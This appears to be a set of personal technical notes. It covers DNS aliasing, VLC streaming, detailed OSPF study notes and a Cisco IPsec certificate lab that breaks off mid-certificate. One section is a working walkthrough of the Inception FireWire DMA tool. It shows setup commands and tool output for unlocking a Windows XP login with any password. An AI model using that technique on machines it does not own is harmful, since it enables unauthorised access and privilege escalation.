www.right.com A 1.1.1.1
*.right.com A 2.2.2.2

All DNS queries for a hostname in the left.org domain are answered with an alias that points the same hostname, but in right.com domain:
C:\> nslookup

> www.left.org

Name:    www.right.com
Address:  1.1.1.1
Aliases:  www.left.org

> right.left.org

Name:    right.right.com
Address:  2.2.2.2
Aliases:  right.left.org

References

RFC 2672

# Bypass local authentication with Inception


Introduction

Inception

Configuration and installation

# cat /etc/modprobe.d/blacklist-firewire.conf
# Select the legacy firewire stack over the new CONFIG_FIREWIRE one.

blacklist ohci1394
blacklist sbp2
blacklist dv1394
blacklist raw1394
blacklist video1394

#blacklist firewire-ohci
#blacklist firewire-sbp2
# update-initramfs -k all -u
# reboot
# lsmod | grep -e firewire -e 1394
firewire_sbp2          15041  0 
firewire_net           13560  0 
ieee1394               94771  1 sbp2
firewire_ohci          24959  0 
firewire_core          51857  3 firewire_sbp2,firewire_net,firewire_ohci
crc_itu_t               1715  1 firewire_cor
# apt-get install git cmake python3 g++
# libforensic1394="http://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz"
# wget --no-check-certificate $libforensic1394
# tar xzvf libforensic1394-0.2.tar.gz
# cd libforensic1394-0.2
# cmake CMakeLists.txt
# make install
# cd python
# python3 setup.py install
# cd
# git clone https://github.com/carmaa/inception.git
# cd inception
# ./setup.py install
# cd

Bypassing Windows XP local authentication

1. Connect a firewire cable (4/4 or 4/6 pin) between your computer and the target.
2. Execute the tool:

# incept

 _|  _|      _|    _|_|_|  _|_|_|_|  _|_|_|    _|_|_|  _|    _|_|    _|      _|
 _|  _|_|    _|  _|        _|        _|    _|    _|    _|  _|    _|  _|_|    _|
 _|  _|  _|  _|  _|        _|_|_|    _|_|_|      _|    _|  _|    _|  _|  _|  _|
 _|  _|    _|_|  _|        _|        _|          _|    _|  _|    _|  _|    _|_|
 _|  _|      _|    _|_|_|  _|_|_|_|  _|          _|    _|    _|_|    _|      _|

v.0.2.2 (C) Carsten Maartmann-Moe 2012

[*] FireWire devices on the bus (names may appear blank):
--------------------------------------------------------------------------------
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID):  (0x0)
--------------------------------------------------------------------------------
[*] Only one device present, device auto-selected as target
[*] Selected device: MICROSOFT CORP.
[*] Available targets:
--------------------------------------------------------------------------------
[1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
[6] Ubuntu: libpam unlock/privilege escalation
[7] Linux Mint: libpam unlock/privilege escalation
--------------------------------------------------------------------------------
[!] Please select target (or enter 'q' to quit): 4
[*] Selected target: Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
[*] DMA shields should be down by now. Attacking...
[*] Searching,  334 MiB so far
[*] Signature found at 0x14eb7862 (in page # 85687)
[*] Write-back verified; patching successful
[*] BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!

3. Login into the target computer using a existing user and the password you prefer.

# Unicast streaming with VLC


Introduction

VideoLAN Streaming Howto

Send an audio stream to two unicast IP addresses
video_server# cvlc -vvv audio.mp3 --sout '#duplicate{
dst=rtp{mux=ts,dst=192.168.0.1,port=2001},
dst=rtp{mux=ts,dst=192.168.0.2,port=2002}
}'
client_1# cvlc -vvv rtp://@:2001
client_2# cvlc -vvv rtp://@:2002

Send an audio stream transcoded to MPEG, 16kbps, 8kHz and mono

video_server# cvlc -vvv audio.mp3 --sout '#transcode{
acodec=mpga,ab=16,channels=1,samplerate=8000
}:
duplicate{
dst=rtp{mux=ts,dst=192.168.0.1,port=2001},
dst=rtp{mux=ts,dst=192.168.0.2,port=2002}
}'

Bitrate calculation

bitrate = bits/second (bps)
samplerate = samples/seconds (Hz)
bit_resolution = bits/sample
channels = 1 (mono), 2 (stereo)

bitrate = samplerate * bit_resolution * channels

For example:

16kbps = 8kHz * 2b * 1

# OSPF

OSPF Router IDs

Before a router can send any OSPF messages, it needs a 32-bit dotted-decimal router identifier (RID).
Election:

- RID configured using router-id _id_ subcommand (best practice).
- Use the highest IP address on any loopback interface
- Use the highest IP address on any non-loopback interface.

Details:

- The RID does not need to be matched by an OSPF network command.
- The RID election occurs when the OSPF process is started or restarted.
- If a router's RID changes, the rest of the routers in the same area will perform a new SPF calculation (Dijkstra algorithm).

Becoming Neighbors, Exchanging Databases, and Becoming Adjacent

OSPF encapsulates the five types of OSPF messages inside IP packets (IP protocol 89):

- Hello: Used to discover and monitor neighbors.
- Database Description (DBD): To exchange brief versions of each LSA (data structure inside the LSDB). Typically on initial topology exchange.
- Link-State Request (LSR): To request full details about one or more LSAs.
- Link-State Update (LSU): Contains fully detailed information about one or more LSAs (in response to an LSR).
- Link-State Acknowledgement (LSAck): To confirm receipt of an LSU.

OSPF neighbor states:

- Down: no hellos received for more than the dead interval.
- Attempt: sending hellos to a manually configured neighbor.
- Init: hello received but does not contain the own RID. Permanent state if parameters do not match.
- 2-way: hello received and contains the own RID. Permanent state of DRother neighbors.
- ExStart: DR election (if needed) and DBD sequence number negotiation.
- Exchange: DBD exchange.
- Loading: LSR, LSU and LSAck.
- Full: complete adjacency (identical LSDB) and routing table calculations begin.

Becoming Neighbors: The Hello Process

Hello messages major functions:

- Discover neighbors.
- Check parameters.
- Monitor health (heartbeat function).

OSPF routers listen for multicast Hello messages sent to 224.0.0.5.
To form a neighbor relationship, these parameters need to match:

- Authentication.
- Primary subnet and subnet mask.
- OSPF area.
- Area type (stub, NSSA, ...).
- Unique RIDs.
- OSPF Hello and Dead timers.
- MTU for successfully DBD exchange.

The hello interval defaults to 10 seconds on LAN interfaces and 30 secons on slower WAN interfaces.
The dead interval defaults to 4 times the hello interval.

Database Descriptor Exchange: Master/Slave Relationship

The router with the higher RID becomes the masters and initiates the database exchange.
The slaves acknowledge each packet received.
Only the master can increment sequence numbers in the DBD exchange (LSA headers) process.

Requesting, Getting, and Acknowledging LSAs

The sequence number permits to know if one LSA is newer than other.
Each sequence number is incremented every time the LSA changes.
New LSAs begin with sequence number 0x80000001 (negative number) and increase to 0x7fffffff (positive number).
LSUs can be acknowledged by the receiver repeating the exact same LSU back to the sender or sending back an LSAck packet.

DR Election on LANs

At boot, after receiving a hello with a 0.0.0.0 DR field, all routers wait the OSPF wait time, which is set to the same value as the dead time, before attempting to elect a DR.
If a router receives a hello with a RID DR field, the router does not have to wait before beginning the election process.

To elect a DR, routers look first the highest priority (1-255, 0 to do not claim as a DR candidate)an finally for the highest RID.
If a received hello implies a better potencial DR, the router stops claiming to want to be a DR. The router not claiming to be the DR, but the second best candidate becomes the BDR.
After DR and BDR election, there is not preemption, but if a DR fails, the BDR becomes the DR and a new BDR election occurs.

Designated Routers on WANs and OSPF Network Types

LAN interfaces default to use an OSPF network type of broadcast (elect a DR and dynamically find neighbors).
HDLC and PPP links use a network type of point-to-point (no DR is elected and neighbors found through hellos).
NBMA networks elect a DR/BDR and requires a manually neighbor command.
Interface type can be set with ip ospf network _type_ interface subcommand.
OSPF network types:

- Broadcast: Uses DR/BDR, 10 secs Hello interval, does not require neighbor command, more than two routers allowed.
- Point-to-point: Does not use DR/BDR, 10 secs Hello interval, does not require neighbor command, two routers allowed.
- NBMA: Uses DR/BDR, 30 secs Hello interval, requires neighbor command, more than two routers allowed.
- Point-to-multipoint: Does not use DR/BDR, 30 seconds Hello interval, does not require neighbor command, more than two routers allowed.
- Point-to-multipoint nonbroadcast: Does not use DR/BDR, 30 seconds Hello interval, requires neighbor command, more than two routers allowed.

Caveats Regarding OSPF Network Types over NBMA Networks

- Check default Hello/Dead timers.
- Check all routers use the neighbor command.
- The DR and BDR must have a PVC (Permanent Virtual Circuit) to every other router in the subnet (DBD and LSU packets).

Two simple options for making OSPF work over Frame Relay, both which do not require a DR or a neighbor command:

- If the design allows the use of point-to-pint subinterfaces, use those.
- If multipoint subinterfaces are needed, or if the configuration must not use subinterfaces, use ip ospf network point-to-multipoint.

Note: A router's neighbor priority setting is compared with the priority inside the Hello it receives from that neighbor. The larger of the two values is used.

Steady-State Operation

- Each router expects to receive Hellos from neighbors within the dead interval.
- Each router advertising an LSA refloods each LSA (after incrementing its sequence number by 1) based on the refresh interval (30 minutes by default).
- Each router expects to have its LSA refreshed within the maxage timer (60 minutes by default).

OSPF Design Terms

Using OSPF areas provides the following benefits:

- Smaller LSDB, requiring less memory.
- Faster SPF computation.
- A link failure in one area only requires a partial SPF computation in other areas.
- Routers may only be summarized at ABRs and ASBRs.

OSPF Path Selection Process

- OSPF always choose an intra-area router over an inter-area route for the same prefix, regardless of metric.
- ABRs ignore Type 3 LSAs learned in a non-area 0, preventing to choose a route that goes into a non-area 0 and then back into area 0.

LSA Types and Network Types

- LSA Type 1 (Router): One per router. Lists RID and all interface IP addresses.
- LSA Type 2 (Network): One per transit network. Created by the DR on the subnet. Represents the subnet and router interfaces connected to the subnet.
- LSA Type 3 (Net Summary): Created by the ABR. Defines the subnets in the origin area, cost, but no topology data.
- LSA Type 4 (ASBR Summary): Advertises a host route to reach the ASBR.
- LSA Type 5 (AS External): External routes injected into OSPF.
- LSA Type 6 (Group Membership): MOSPF.
- LSA Type 7 (NSSA External): Used in NSSA instead of a type 5 LSA.
- LSA Type 8 (External Attributes)
- LSA Type 9 (Opaque): Generic LSA used for OSPF extension.

A transit network is a network over which two or more OSPF routers have become neighbors.
A stub network is a network on which a router has not formed any neighbor relationships.

LSA Types 1 and 2

To signify a network that is down, the apropiate type 1 or 2 LSA is change to show a metric of 16.777.215 (2^24 - 1).

LSA Type 3 and Inter-Area Costs

Each type 3 LSA describes a single vector (subnet, mask, and ABR's cost to reach the subnet).

LSA Types 4 and 5, and External Route Types 1 and 2

External type 1 adds the internal and external metrics togheter to compute the metric.
External type 2 only uses the external metric to compute the metric.
ASBRs inject external routes using type 5 LSA that reach all areas.
When ABRs flood the type 5 LSA into another area, the ABRs create a type 4 LSA, listing the ABR's metric to reach the ASBR that created the type 5 LSA. E1 routes are calculated by adding the cost to reach the ASBR and the cost listed in type 5 LSA.

Stubby Areas

- Stub: Stops type 5 LSAs, does not stop type 3 LSAs, does not create type 7 LSAs.
- Totally stubby: Stops type 5 LSAs, stops type 3 LSAs, does not create type 7 LSAs.
- NSSA: Stops type 5 LSAs, does not stop type 3 LSAs, creates type 7 LSAs.
- Totally NSSA: Stops type 5 LSAs, stops type 3 LSAs, creates type 7 LSAs.

- Stub: area _area-id_ stub
- Totally stubby: area _area-id_ stub no-summary
- NSSA: area _area-id_ nssa
- Totally NSSA: area _area-id_ nssa no-summary

Graceful Restart

Also known as nonstop forwarding (NSF), takes advantage of modern router architectures using separate routing and forwarding planes.
It is possible to continue forwarding without loops while routing process restarts, assuming:

- The router to restart must notify its neighbors sending a "grace LSA".
- The LSDB remains stable during the restart.
- All neighbors support, and are configured for, graceful restart.
- The restart takes place within a "grace period"

This feature is enabled by default and the following commands disable the cisco and IETF versions:
nsf cisco helper disable
nsf ietf helper disable

Choosing the Best Type of Path

Routers ignore the cost and choose the best route based on the following order of precedence:

- Intra-area routes
- Inter-area routes
- E1 routes
- E2 routes

Best-Path Side Effects of ABR Loop Prevention

OSPF applies Split Horizon so an LSA is not advertised into one nonbackarea and then advertised back into the backbone area.
ABRs ignore LSA creates by other ABRs, when learned through a nonbackbone area, when calculating leas-cost paths.

OSPF Configuration

ip ospf dead-interval minimal hello-multiplier 4: 250 ms hello interval and 1 seconds dead interval.
ip ospf priority 255: Maximum priority value to become the DR.
router-id 1.1.1.1: RID manually configured, removing any reliance on an interface address.
The no-summary command option used in stub/nssa areas is only necessary in ABRs.
clear ip ospf process: All OSPF processes are cleared. DOWN -> INIT -> 2WAY -> EXSTART -> EXCHANGE -> LOADING -> FULL
The auto-cost reference-bandwidth 10000 command change the reference bandwidth from 100Mbps (10^8 / bandwidth) to 10.000Mbps (10^10 / bandwidth).
The following list summarizes how IOS chooses OSPF interfaces costs:

- neighbor _RID_ cost _value_ OSPF command.
- ip ospf cost _value_ interface command.
- Default OSPF reference bandwidth.
- Changed OSPF reference bandwidth (auto-cost reference-bandwidth).

Alternatives to the OSPF Network Command

The network 10.3.0.0 0.0.255.255 area 3 OSPF command.
The ip ospf 1 area 3 interface command.
With the first one, OSPF advertises secondary subnets that are matched by the command as stub networks.
With the second one, OSPF advertises all subnets on the interface (primary and secondary as stub networks).

OSPF Filtering

There are three major types of OSPF filtering:

- Filtering routes, not LSAs.
- ABR type 3 LSA filtering.
- ABR using the area range no-advertise option.

Filtering Routes Using the distribute-list Command

With OSPF, the distribute-list command filters what ends up in the IP routing table and does not filter inbound LSAs.
Router(config)# ip prefix-list PREFIX_LIST seq 5 deny 10.1.1.0/24        
Router(config)# ip prefix-list PREFIX_LIST seq 10 permit 0.0.0.0/0 le 32
Router(config)# router ospf 1
Router(config-router)# distribute-list prefix PREFIX_LIST in fa0/0
Router(config)# access-list 2 permit 2.2.2.2
Router(config)# access-list 11 permit 10.1.1.0 0.0.0.255
Router(config)# route-map ROUTE_MAP deny 10
Router(config-route-map)# match ip address 11
Router(config-route-map)# match ip route-source 2
Router(config)# route-map ROUTE_MAP permit 20
Router(config)# router ospf 1
Router(config-router)# distribute-list route-map ROUTE_MAP in

OSPF ABR LSA Type 3 Filtering

The next command filters type 3 LSA going out of area 3:

Router(config)# ip prefix-list PREFIX_LIST seq 5 deny 10.3.2.0/23        
Router(config)# ip prefix-list PREFIX_LIST seq 10 permit 0.0.0.0/0 le 32
Router(config)# router ospf 1
Router(config-router)# area 3 filter-list prefix PREFIX_LIST out

The next command filters type 3 LSA going into area 0:

Router(config-router)# area 0 filter-list prefix PREFIX_LIST in

Filtering Type 3 LSAs with the area range Command

The next command filters type 3 LSA going out of area 3:

Router(config-router)# area 3 range 10.3.2.0 255.255.254.0 not-advertise

The area range command, without the not-advertise option, performs route summarization.

Virtual Link Configuration

OSPF requires that each nonbackbone area be connected to area 0.
OSPF also requires that each router within an area have a contiguous intra-area path to the other routers in the same area.
It is important when authenticating virtual links to remember that the virtual links themselves area in area 0.

Router1(config)# router ospf 1
Router1(config-router)# area 3 virtual-link 3.3.3.3
Router3(config)# router ospf 1
Router3(config-router)# area 3 virtual-link 1.1.1.1

Configuring OSPF Authentication

Basic rules:

- There are three types: type 0 (none), type 1 (clear text) and type 2 (MD5).
- Authentication is enabled using the following interface commands:
!Type 0
ip ospf authentication mull
!Type 1
ip ospf authentication
ip ospf authentication-key SECRET_KEY
!Type 2
ip ospf authentication message-digest
ip ospf message-digest-key 1 md5 SECRET_KEY
- The default authentication is type 0.
- The default authentication can be redefined for all interfaces using the following commands under router ospf:
!Type 1
area _num_ authentication
!Type 2
area _num_ authentication message-digest
- Multiple keys are allowed per interface. OSPF sends multiple copies of each message (one for each key).
- Virtual links have no underlying interface so they are configured under router ospf:
!Type 0
area _num_ virtual-link _RID_ authentication null
!Type 1
area _num_ virtual-link _RID_ authentication authentication-key SECRET_KEY
!Type 2
area _num_ virtual-link _RID_ authentication message-digest message-digest-key 1 md5 SECRET_KEY
- The interface authentication takes precedence over router ospf authentication.

OSPF Stub Router Configuration

OSPF converges faster than BGP. Using the stub router feature on ASBRs the metrics are advertised with infinite cost for a configured time period or until BGP convergence is complete.
Under router ospf:

max-metric router-lsa on-startup _seconds_
max-metric router-lsa on-startup wait-for-bgp

OSPF Timer Summary

- MaxAge: The maximum time an LSA can be in the LSDB, without receiving a newer copy, before it is removed. Default is 3600 seconds.
- LSRefresh: Time interval per LSA to reflood an identical LSA. Prevents the expiration of MaxAge. Default is 1800 seconds.
- Hello: Default is 10 or 30 seconds.
- Dead: Time interval in which a Hello should be received from a neighbor. Default is 4 times the hello interval.
- Wait: Time a router will wait after reaching a 2WAY state for asserting a DR. Default is 4 times the hello interval.
- Retransmission: The time between sending an LSU, not receiving an ack, and resending the LSU. Default is 5 seconds.

# Site-to-site IPsec VPN with certificates


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Certificate signing request (CSR)

ROUTER-1# clock set 21:00:00 7 Oct 2012
ROUTER-1(config)# hostname router-1
router-1(config)# ip domain-name lab.net
router-1(config)# crypto pki trustpoint INCAWETRUST
router-1(ca-trustpoint)# enrollment terminal pem
router-1(ca-trustpoint)# fqdn router-1.lab.net
router-1(ca-trustpoint)# subject-name C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
router-1(ca-trustpoint)# revocation-check none
router-1(ca-trustpoint)# rsakeypair router-1.lab.net 1024
router-1(config)# crypto key zeroize rsa
router-1(config)# crypto key generate rsa general-keys label router-1.lab.net export modulus 1024
router-1(config)# crypto pki enroll INCAWETRUST
% Start certificate enrollment .. 

% The subject name in the certificate will include: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
% The subject name in the certificate will include: router-1.lab.net
% Include the router serial number in the subject name? [yes/no]: no
% Include an IP address in the subject name? [no]: no
Display Certificate Request to terminal? [yes/no]: yes
Certificate Request follows:

-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTEubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMS5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDJGnpad++Ll/2DdGumYJWYnBxT2uWySlq
/5RBhpKigyDWg/1WEBfxc92ImdKuz438GXoLW+r6SXwJkeszvsFuKqKNfdt5zC8y
ZCcAQzWhM6RL36UQKhRZXq+kBGGhDyTIDBx8hgOEuC9SnK6ACapvPmR2Y738TBSx
La005oVIUwIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAeKhsFhdbcyX9CKEVxagQeF7bomWfc7YR04AMM0u1
t6iZJixHbADJQ1fa8LFjP/MbkRA2KwqHxtGN/D0uhyqE/vAfwslMV/Mm8l9c2iOC
HfzzV2bhQW9FpDcHyJSmmScINh1pZieczCiVAH+LGQVI2VkxY/CKEsqXUb2mQShZ
QlA=
-----END CERTIFICATE REQUEST-----

---End - This line not part of the certificate request---

Redisplay enrollment request? [yes/no]: no
ROUTER-2# clock set 21:02:00 7 Oct 2012
ROUTER-2(config)# hostname router-2
router-2(config)# ip domain-name lab.net
router-2(config)# crypto pki trustpoint INCAWETRUST
router-2(ca-trustpoint)# enrollment terminal pem
router-2(ca-trustpoint)# fqdn router-2.lab.net
router-2(ca-trustpoint)# subject-name C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net
router-2(ca-trustpoint)# revocation-check none
router-2(ca-trustpoint)# rsakeypair router-2.lab.net 1024
router-2(ca-trustpoint)# crypto key generate rsa general-keys label router-2.lab.net export modulus 1024
router-2(config)# crypto pki enroll INCAWETRUST
% Start certificate enrollment .. 

% The subject name in the certificate will include: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-2.lab.net    
% The subject name in the certificate will include: router-2.lab.net
% Include the router serial number in the subject name? [yes/no]: no
% Include an IP address in the subject name? [no]: no
Display Certificate Request to terminal? [yes/no]: yes
Certificate Request follows:

-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTIubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMi5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQCp+XYSYBFz1iBJEoXSvWjslMSmClPGULuu
VbOnKme8SkWUKbwUUKzP73nSSzMQy1bJqmRaNv2ZKBL/7fmRqUcEKL6mFLaz7i9w
hpUieO65QLEaW1O9skMuwZziwgzR/rbPx+AyZg/3qI6WLKm/NayDZK102fcFuD95
LCYx4AdwPQIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAAmwl6OdFYzRzPmnFgeqC7unXOtpWNwccQs0CTAna
EdKu+dtGB3wEruGciASOTJZGX33Y+p4SmXdNDk50Bvpc8pqMveDuLbDASeeJmQqo
Wzjv6FZ3r+/qf1xJwSXVhsE4K53XOfaoU4Wb+DTyyHskyqU+GkcJujIa7wTNEoHK
Uf8=
-----END CERTIFICATE REQUEST-----

---End - This line not part of the certificate request---

Redisplay enrollment request? [yes/no]: no

CA configuration

LINUX-CA# mkdir /etc/ssl/CA
LINUX-CA# mkdir /etc/ssl/newcerts
LINUX-CA# echo '01' > /etc/ssl/CA/serial
LINUX-CA# touch /etc/ssl/CA/index.txt
LINUX-CA# cat /etc/ssl/openssl.cnf
...
[ CA_default ]

dir             = /etc/ssl
database        = $dir/CA/index.txt
certificate     = $dir/certs/cacert.pem
serial          = $dir/CA/serial
private_key     = $dir/private/cakey.pem
...
string_mask = default
...

LINUX-CA# openssl req -new -x509 -extensions v3_ca -keyout cakey.pem -out cacert.pem -days 3650
Generating a 1024 bit RSA private key
...................++++++
................++++++
writing new private key to 'cakey.pem'
Enter PEM pass phrase:MY_SECRET
Verifying - Enter PEM pass phrase:MY_SECRET
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:ES
State or Province Name (full name) [Some-State]:CAT
Locality Name (eg, city) []:BCN
Organization Name (eg, company) [Internet Widgits Pty Ltd]:CAnet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:canet.lab.net
Email Address []:root@lab.net

LINUX-CA# mv cakey.pem /etc/ssl/private/.
LINUX-CA# mv cacert.pem /etc/ssl/certs/.
LINUX-CA# cat /etc/ssl/certs/cacert.pem
-----BEGIN CERTIFICATE-----
MIICqjCCAhOgAwIBAgIJANGQlt8Z5+XTMA0GCSqGSIb3DQEBBQUAMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDAeFw0xMjEwMDcxOTAzMjZaFw0yMjEwMDUxOTAzMjZaMG4xCzAJBgNV
BAYTAkVTMQwwCgYDVQQIEwNDQVQxDDAKBgNVBAcTA0JDTjEOMAwGA1UEChMFQ0Fu
ZXQxFjAUBgNVBAMTDWNhbmV0LmxhYi5uZXQxGzAZBgkqhkiG9w0BCQEWDHJvb3RA
bGFiLm5ldDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA1f6Y35sevFE14T33
5oRwMrCIZ8b6c2kLd1M9CqJqVlc0Ru37k/PLm4RmIy+d45JpL5GizuUn1XtAWI1N
/rdO8FrAKQ0SNNTRgT3MeJJX9iWbYcWj6atgntxxY5fLHszbXyohxnQieFjgq6oz
PuKXTEO3jIQhe+yZtg4fhbT/BN0CAwEAAaNQME4wHQYDVR0OBBYEFAV3rWlHkgVi
SgywgAlUCwqJL/3IMB8GA1UdIwQYMBaAFAV3rWlHkgViSgywgAlUCwqJL/3IMAwG
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAxSnlrZhAMH0FmTMlXVGlzWa1
Rf/8Q8TJ+bA3Z6LwaaPQb/+9oAnF7MVsLnhbWd7XEyn1AM7qxgrlhFidRMKFnoJq
cEevAM2hBbsxaE1EA0eWycsM/z8rA4Flnp8IKo/Wds0+L64FqRDjTfsBfcbRiCem
Nsick9kDj2oiDw+f6mY=
-----END CERTIFICATE-----

Signing CSR

LINUX-CA# cat router-1.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB3jCCAUcCAQAwfTEZMBcGA1UEAxMQcm91dGVyLTEubGFiLm5ldDEUMBIGA1UE
CxMLRW5naW5lZXJpbmcxDjAMBgNVBAoTBUNBbmV0MQwwCgYDVQQIEwNDQVQxCzAJ
BgNVBAYTAkVTMR8wHQYJKoZIhvcNAQkCFhByb3V0ZXItMS5sYWIubmV0MIGfMA0G
CSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDJGnpad++Ll/2DdGumYJWYnBxT2uWySlq
/5RBhpKigyDWg/1WEBfxc92ImdKuz438GXoLW+r6SXwJkeszvsFuKqKNfdt5zC8y
ZCcAQzWhM6RL36UQKhRZXq+kBGGhDyTIDBx8hgOEuC9SnK6ACapvPmR2Y738TBSx
La005oVIUwIDAQABoCEwHwYJKoZIhvcNAQkOMRIwEDAOBgNVHQ8BAf8EBAMCBaAw
DQYJKoZIhvcNAQEEBQADgYEAeKhsFhdbcyX9CKEVxagQeF7bomWfc7YR04AMM0u1
t6iZJixHbADJQ1fa8LFjP/MbkRA2KwqHxtGN/D0uhyqE/vAfwslMV/Mm8l9c2iOC
HfzzV2bhQW9FpDcHyJSmmScINh1pZieczCiVAH+LGQVI2VkxY/CKEsqXUb2mQShZ
QlA=
-----END CERTIFICATE REQUEST-----
LINUX-CA# openssl ca -in router-1.csr -config /etc/ssl/openssl.cnf
Using configuration from /etc/ssl/openssl.cnf
Enter pass phrase for /etc/ssl/private/cakey.pem:MY_SECRET
Check that the request matches the signature
Signature ok
Certificate Details:
        Serial Number: 1 (0x1)
        Validity
            Not Before: Oct  7 19:05:16 2012 GMT
            Not After : Oct  7 19:05:16 2013 GMT
        Subject:
            countryName               = ES
            stateOrProvinceName       = CAT
            organizationName          = CAnet
            organizationalUnitName    = Engineering
            commonName                = router-1.lab.net
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                81:DF:AB:0F:C0:6B:31:4B:08:5E:6D:86:11:26:9C:90:85:F5:83:8F
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

Certificate is to be certified until Oct  7 19:05:16 2013 GMT (365 days)
Sign the certificate? [y/n]:y


1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
    Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=ES, ST=CAT, L=BCN, O=CAnet, CN=canet.lab.net/emailAddress=root@lab.net
        Validity
            Not Before: Oct  7 19:05:16 2012 GMT
            Not After : Oct  7 19:05:16 2013 GMT
        Subject: C=ES, ST=CAT, O=CAnet, OU=Engineering, CN=router-1.lab.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:c3:24:69:e9:69:df:be:2e:5f:f6:0d:d1:ae:99:
                    82:56:62:70:71:4f:6b:96:c9:29:6a:ff:94:41:86:
                    92:a2:83:20:d6:83:fd:56:10:17:f1:73:dd:88:99:
                    d2:ae:cf:8d:fc:19:7a:0b:5b:ea:fa:49:7c:09:91:
                    eb:33:be:c1:6e:2a:a2:8d:7d:db:79:cc:2f:32:64:
                    27:00:43:35:a1:33:a4:4b:df:a5:10:2a:14:59:5e:
                    af:a4:04:61:a1:0f:24:c8:0c:1c:7c:86:03:84:b8:
                    2f:52:9c:ae:80:09:aa:6f:3e:64:76:63:bd:fc:4c:
                    14:b1:2d:ad:34:e6:85:48:53
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                OpenSSL Generated Certificate
            X509v3 Subject Key Identifier: 
                81:DF:AB:0F:C0:6B:31:4B:08:5E:6D:86:11:26:9C:90:85:F5:83:8F
            X509v3 Authority Key Identifier: 
                keyid:05:77:AD:69:47:92:05:62:4A:0C:B0:80:09:54:0B:0A:89:2F:FD:C8

    Signature Algorithm: sha1WithRSAEncryption
         84:65:11:b5:db:df:f4:ce:d5:3c:d7:a4:d3:10:b8:cc:d5:c5:
         35:c3:7e:95:e6:d2:0b:e2:a9:0e:f6:b4:e7:a4:00:f4:0b:d2:
         04:a3:b1:bc:ba:44:4d:6a:a9:a2:f2:84:ea:5b:70:97:52:46:
         1b:fd:86:74:7f:75:88:50:6e:10:59:c5:20:84:a6:b4:8f:59:
         30:7f:8c:a7:7e:13:60:85:de:5a:a4:8f:ce:05:ba:7c:c6:84:
         fd:10:d0:86:c0:f3:b6:49:02:da:7b:9c:29:c8:8a:d9:7d:c3:
         d1:51:cd:0e:f4:b1:4a:2d:6c:26:16:06:ba:19:c2:79:8e:3f:
         e3:4e
-----BEGIN CERTIFICATE-----
MIICuzCCAiSgAwIBAgIBATANBgkqhkiG9w0BAQUFADBuMQswCQYDVQQGEwJFUzEM
MAoGA1UECBMDQ0FUMQwwCgYDVQQHEwNCQ04xDjAMBgNVBAoTBUNBbmV0MRYwFAYD
